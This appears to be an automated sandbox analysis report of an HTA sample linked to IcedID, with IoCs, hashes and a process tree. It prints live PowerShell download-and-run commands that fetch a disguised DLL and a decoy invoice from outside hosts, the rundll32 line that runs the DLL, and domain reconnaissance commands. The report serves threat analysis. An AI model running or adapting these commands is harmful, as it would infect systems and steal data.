Analysis
max time kernel: 145s
max time network: 139s
platform: windows10-2004_x64
resource: win10v2004-20221111-en
resource tags: arch:x64, arch:x86, image:win10v2004-20221111-en, locale:en-us, os:windows10-2004-x64, system
submitted: 04-02-2023 22:06
Static task: static1
Behavioral task: behavioral1 (Sample 2.hta, Resource win7-20220812-en)
Behavioral task: behavioral2 (Sample 2.hta, Resource win10v2004-20221111-en)
General
Target: 2.hta
Size: 1KB
MD5: 78b6f14f36098c269c3d03a29eb35bc8
SHA1: afd76bfe0d6ac105730b218152d0a650b6a869b7
SHA256: c815343206eab5b6d29bea2d12f02bf8f446944554f053203afc414acc77e859
SHA512: 57b5a24f6c2610961e5c08d64872290d5b1399a80fc4335e60b88e3d20a679576a108d313b9a710b59e604732e0ea6e91313d65e16a10eb3eda3fe4e503d9712
Malware Config
Extracted: http://helthbrotthersg.com/view.png
Extracted: https://transfer.sh/get/vpiHmi/invoice.pdf
Extracted: icedid (3954321778, ehonlionetodo.com)
Signatures

Blocklisted process makes network request 10 IoCs
Processes: mshta.exe, powershell.exe, powershell.exe, rundll32.exe
  flow  pid   process
  6     1648  mshta.exe
  8     1648  mshta.exe
  18    212   powershell.exe
  20    3644  powershell.exe
  52    1608  rundll32.exe
  61    1608  rundll32.exe
  62    1608  rundll32.exe
  63    1608  rundll32.exe
  65    1608  rundll32.exe
  68    1608  rundll32.exe

Downloads MZ/PE file

Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes: mshta.exe
  description        ioc                                                                                                process
  Key value queried  \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation  mshta.exe

Loads dropped DLL 3 IoCs
Processes: rundll32.exe, rundll32.exe
  pid   process
  3644  rundll32.exe
  1608  rundll32.exe
  1608  rundll32.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.

Accesses Microsoft Outlook profiles 1 TTPs 7 IoCs
Processes: rundll32.exe
  description  ioc                                                                                                                                                             process
  Key opened   \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676                       rundll32.exe
  Key opened   \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676                       rundll32.exe
  Key opened   \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676  rundll32.exe
  Key opened   \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Software\Microsoft\Office\11.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676                       rundll32.exe
  Key opened   \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Software\Microsoft\Office\12.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676                       rundll32.exe
  Key opened   \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676                       rundll32.exe
  Key opened   \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676                       rundll32.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes: AcroRd32.exe
  description        ioc                                                                 process
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz  AcroRd32.exe
  Key opened         \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0       AcroRd32.exe

Discovers systems in the same network 1 TTPs 2 IoCs

Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
Processes: ipconfig.exe
  pid   process
  1884  ipconfig.exe

Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.

Modifies Internet Explorer settings
Processes: AcroRd32.exe
  description  ioc                                                                                                                                    process
  Key created  \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION  AcroRd32.exe

Modifies registry class 3 IoCs
Processes: powershell.exe, rundll32.exe
  description       ioc                                                                                                          process
  Key created       \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\Local Settings                                  powershell.exe
  Key created       \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\CLSID\{9190DBCF-1D27-13D3-9892-02F4385A3FD9}    rundll32.exe
  Set value (data)  \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\CLSID\{9190DBCF-1D27-13D3-9892-02F4385A3FD9}\ = 8e11aadfb83d92512e782a3f6b8a29b0794bd1622b2afd06531b56d389506774982cca77dae674020def0755ad1daf897afb33ae1a3d073bc692eca01adde7ed97d412319f27f3680743d3139d71309686aa4f63389b552442df4c34ec65552afd9e5b360e0300962d23cacf9386172a8ee4956d5967a0db0f7c6b56cadb43320ac11b7ca94ba23420d80d5942c919e675b00f2da58825970ed19938b7eb9d3bc8928675130d25de0857dc096e3c5dcc992f5f4ea792a5c814ef6969c98d3fcbedfe264fd665accee1d4ac8a98b305535dd81327ba9e20144c30c897fb453c  rundll32.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 28 IoCs
Processes: powershell.exe, powershell.exe, AcroRd32.exe, rundll32.exe
  pid   process         entries (identical rows collapsed)
  3644  powershell.exe  2
  212   powershell.exe  2
  4924  AcroRd32.exe    20
  1608  rundll32.exe    4

Suspicious use of AdjustPrivilegeToken 44 IoCs
Processes: powershell.exe, powershell.exe, WMIC.exe
  pid   process         token
  212   powershell.exe  SeDebugPrivilege
  3644  powershell.exe  SeDebugPrivilege
  2928  WMIC.exe        SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36 (this set of 21 tokens is recorded twice, 42 entries)
Suspicious use of FindShellTrayWindow 1 IoCs
Processes: AcroRd32.exe
  pid   process
  4924  AcroRd32.exe

Suspicious use of SetWindowsHookEx 6 IoCs
Processes: AcroRd32.exe
  pid   process       entries (identical rows collapsed)
  4924  AcroRd32.exe  6
Suspicious use of WriteProcessMemory 64 IoCs
Processes: mshta.exe, powershell.exe, AcroRd32.exe, RdrCEF.exe
  description                     pid   process          target process   entries (identical rows collapsed)
  PID 1648 wrote to memory of 212   1648  mshta.exe        powershell.exe   3
  PID 1648 wrote to memory of 3644  1648  mshta.exe        powershell.exe   3
  PID 3644 wrote to memory of 4924  3644  powershell.exe   AcroRd32.exe     3
  PID 4924 wrote to memory of 2124  4924  AcroRd32.exe     RdrCEF.exe       3
  PID 2124 wrote to memory of 1692  2124  RdrCEF.exe       RdrCEF.exe       41
  PID 2124 wrote to memory of 1952  2124  RdrCEF.exe       RdrCEF.exe       11
outlook_office_path 1 IoCs
Processes: rundll32.exe
  description  ioc                                                                                                                                process
  Key opened   \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676  rundll32.exe

outlook_win_path 1 IoCs
Processes: rundll32.exe
  description  ioc                                                                                                                                                             process
  Key opened   \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676  rundll32.exe
Processes
(depth in the process tree is given in parentheses; each entry lists the image path, then the command line, then the signatures that fired for it)

(1) C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\2.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    - Blocklisted process makes network request
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory

  (2) C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Exec Bypass -NoP -C (new-object system.net.webclient).downloadFile('http://helthbrotthersg.com/view.png', 'C:\Users\Public\classic.jpg')
      - Blocklisted process makes network request
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

  (2) C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Exec Bypass -NoP -C (new-object system.net.webclient).downloadFile('https://transfer.sh/get/vpiHmi/invoice.pdf', 'C:\Users\Public\invoice.pdf'); Start-Process C:\Users\Public\invoice.pdf
      - Blocklisted process makes network request
      - Modifies registry class
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

    (3) C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Public\invoice.pdf"
        - Checks processor information in registry
        - Modifies Internet Explorer settings
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of FindShellTrayWindow
        - Suspicious use of SetWindowsHookEx
        - Suspicious use of WriteProcessMemory

      (4) C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
          "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
          - Suspicious use of WriteProcessMemory

        (5) C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
            "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=F0CAFC6F08744F76686BF1AE0D8A9667 --mojo-platform-channel-handle=1736 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

        (5) C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
            "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=2C7E8C8B473A9F79B0E04F415CCB4DE1 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=2C7E8C8B473A9F79B0E04F415CCB4DE1 --renderer-client-id=2 --mojo-platform-channel-handle=1752 --allow-no-sandbox-job /prefetch:1

        (5) C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
            "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=9C6032725D176595BE55D04BFF5124A6 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=9C6032725D176595BE55D04BFF5124A6 --renderer-client-id=4 --mojo-platform-channel-handle=2192 --allow-no-sandbox-job /prefetch:1

        (5) C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
            "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=1E2D3BA7BF4B4722F27FD1E1C2C18A9B --mojo-platform-channel-handle=2572 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

        (5) C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
            "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=39F80FA30618790DB44C61B523B1FED1 --mojo-platform-channel-handle=2696 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

        (5) C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
            "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=697FB9A370942C109905CCE604F16146 --mojo-platform-channel-handle=2800 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

  (2) C:\Windows\SysWOW64\rundll32.exe
      "C:\Windows\System32\rundll32.exe" C:\Users\Public\classic.jpg,PluginInit
      - Loads dropped DLL

    (3) C:\Windows\system32\rundll32.exe
        "C:\Windows\System32\rundll32.exe" C:\Users\Public\classic.jpg,PluginInit
        - Blocklisted process makes network request
        - Loads dropped DLL
        - Accesses Microsoft Outlook profiles
        - Modifies registry class
        - Suspicious behavior: EnumeratesProcesses
        - outlook_office_path
        - outlook_win_path

      (4) C:\Windows\system32\cmd.exe
          cmd.exe /c chcp >&2

        (5) C:\Windows\system32\chcp.com
            chcp

      (4) C:\Windows\System32\Wbem\WMIC.exe
          WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List
          - Suspicious use of AdjustPrivilegeToken

      (4) C:\Windows\system32\ipconfig.exe
          ipconfig /all
          - Gathers network information

      (4) C:\Windows\system32\systeminfo.exe
          systeminfo
          - Gathers system information

      (4) C:\Windows\system32\net.exe
          net config workstation

        (5) C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 config workstation

      (4) C:\Windows\system32\nltest.exe
          nltest /domain_trusts

      (4) C:\Windows\system32\nltest.exe
          nltest /domain_trusts /all_trusts

      (4) C:\Windows\system32\net.exe
          net view /all /domain
          - Discovers systems in the same network

      (4) C:\Windows\system32\net.exe
          net view /all
          - Discovers systems in the same network

      (4) C:\Windows\system32\net.exe
          net group "Domain Admins" /domain

        (5) C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 group "Domain Admins" /domain

(1) C:\Windows\System32\CompPkgSrv.exe
    C:\Windows\System32\CompPkgSrv.exe -Embedding
Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
  Filesize 2KB
  MD5 25604a2821749d30ca35877a7669dff9
  SHA1 49c624275363c7b6768452db6868f8100aa967be
  SHA256 7f036b1837d205690b992027eb8b81939ba0228fc296d3f30039eeba00bd4476
  SHA512 206d70af0b332208ace2565699f5b5da82b6a3806ffa51dd05f16ab568a887d63449da79bbaeb46183038837446a49515d62cb6615e5c5b27563cd5f774b93f5

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize 16KB
  MD5 09b3d9d8c83b73e317cc6f184c13d636
  SHA1 ff9d02c9ca0333740b1e70bd430e502aa3df33f9
  SHA256 dfbac826c42a2010a04972a2e0f320bfe5181959591b3e100013160778a2d054
  SHA512 5204873bc7f7a912185099ade78c0d2621d3d4b1a827db49698f233291edfbb90c17af70ce6567774c281d5187da98cc8404e522ebd5e2649e6aa9a89ce281e2

C:\Users\Admin\AppData\Local\Temp\sqlite64.dll
  Filesize 1.8MB
  MD5 26d773a69f6fad3200d49a7aaa77752b
  SHA1 3970ffe8aefe0c30daaec65b85fb103c0fc0f2a7
  SHA256 fca6b7fe66ad9973f18f407e83b56dacd04197cbd35efc498a342d73d6a113e5
  SHA512 0041b52514460dda19dd065fc46393f6fbe248a4c62fce28e0819abd952756996b34fdea286eb7814a7c868a12656a065278932760e61e53f7102b0dba324e4f

C:\Users\Public\classic.jpg
  Filesize 291KB
  MD5 6b1e64957316e65198e3a1f747402bd6
  SHA1 f4df8c9d37a76eadf1125a74865032d83920123b
  SHA256 fbad60002286599ca06d0ecb3624740efbf13ee5fda545341b3e0bf4d5348cfe
  SHA512 dfc44776ec1bef64531228f9894e22a6f84a3009382044265ae51fb9cc664e8565516a3c969860548256a225902a2129709859269121f6c1ee784fc56194d2ff

C:\Users\Public\invoice.pdf
  Filesize 13KB
  MD5 8c8a10d1fa6242df97950317260b7c70
  SHA1 5a657b4434b2d57aec72bdfd2ac753e6e9e01ac5
  SHA256 8030169986fb7ea4b4da63d7c85bc4f41ffcd9048c84518436f69776bdb93087
  SHA512 f96a336812471211a2683d63799467bad77b400fd18c14cf3c3cb512a5351faa9663fa802f4fa3bd2decac8c9ba0be82eea3aaa4ddb135d4638d6a0ede88d66b

Memory dumps (pid-index-range-memory.dmp; mapping.dmp entries carry no size)
memory/212-139-0x00000000063E0000-0x00000000063FE000-memory.dmp  Filesize 120KB
memory/212-132-0x0000000000000000-mapping.dmp
memory/212-138-0x0000000005DA0000-0x0000000005E06000-memory.dmp  Filesize 408KB
memory/212-136-0x0000000005460000-0x0000000005482000-memory.dmp  Filesize 136KB
memory/212-135-0x00000000054A0000-0x0000000005AC8000-memory.dmp  Filesize 6.2MB
memory/212-140-0x0000000007A30000-0x00000000080AA000-memory.dmp  Filesize 6.5MB
memory/432-187-0x0000000000000000-mapping.dmp
memory/896-190-0x0000000000000000-mapping.dmp
memory/1356-189-0x0000000000000000-mapping.dmp
memory/1532-194-0x0000000000000000-mapping.dmp
memory/1608-175-0x0000000000000000-mapping.dmp
memory/1608-177-0x0000020E1AD30000-0x0000020E1AD39000-memory.dmp  Filesize 36KB
memory/1608-178-0x0000020E1B410000-0x0000020E1B45C000-memory.dmp  Filesize 304KB
memory/1692-151-0x0000000000000000-mapping.dmp
memory/1884-186-0x0000000000000000-mapping.dmp
memory/1952-154-0x0000000000000000-mapping.dmp
memory/1964-196-0x0000000000000000-mapping.dmp
memory/2124-149-0x0000000000000000-mapping.dmp
memory/2232-183-0x0000000000000000-mapping.dmp
memory/2300-193-0x0000000000000000-mapping.dmp
memory/2728-167-0x0000000000000000-mapping.dmp
memory/2928-185-0x0000000000000000-mapping.dmp
memory/3572-164-0x0000000000000000-mapping.dmp
memory/3644-137-0x0000000005620000-0x0000000005686000-memory.dmp  Filesize 408KB
memory/3644-133-0x0000000000000000-mapping.dmp
memory/3644-134-0x0000000002700000-0x0000000002736000-memory.dmp  Filesize 216KB
memory/3644-172-0x0000000000000000-mapping.dmp
memory/3644-144-0x0000000007F50000-0x00000000084F4000-memory.dmp  Filesize 5.6MB
memory/3644-142-0x0000000007180000-0x0000000007216000-memory.dmp  Filesize 600KB
memory/3644-141-0x00000000061E0000-0x00000000061FA000-memory.dmp  Filesize 104KB
memory/3644-143-0x0000000007110000-0x0000000007132000-memory.dmp  Filesize 136KB
memory/3900-191-0x0000000000000000-mapping.dmp
memory/4248-192-0x0000000000000000-mapping.dmp
memory/4288-184-0x0000000000000000-mapping.dmp
memory/4308-170-0x0000000000000000-mapping.dmp
memory/4656-159-0x0000000000000000-mapping.dmp
memory/4924-145-0x0000000000000000-mapping.dmp
memory/4984-195-0x0000000000000000-mapping.dmp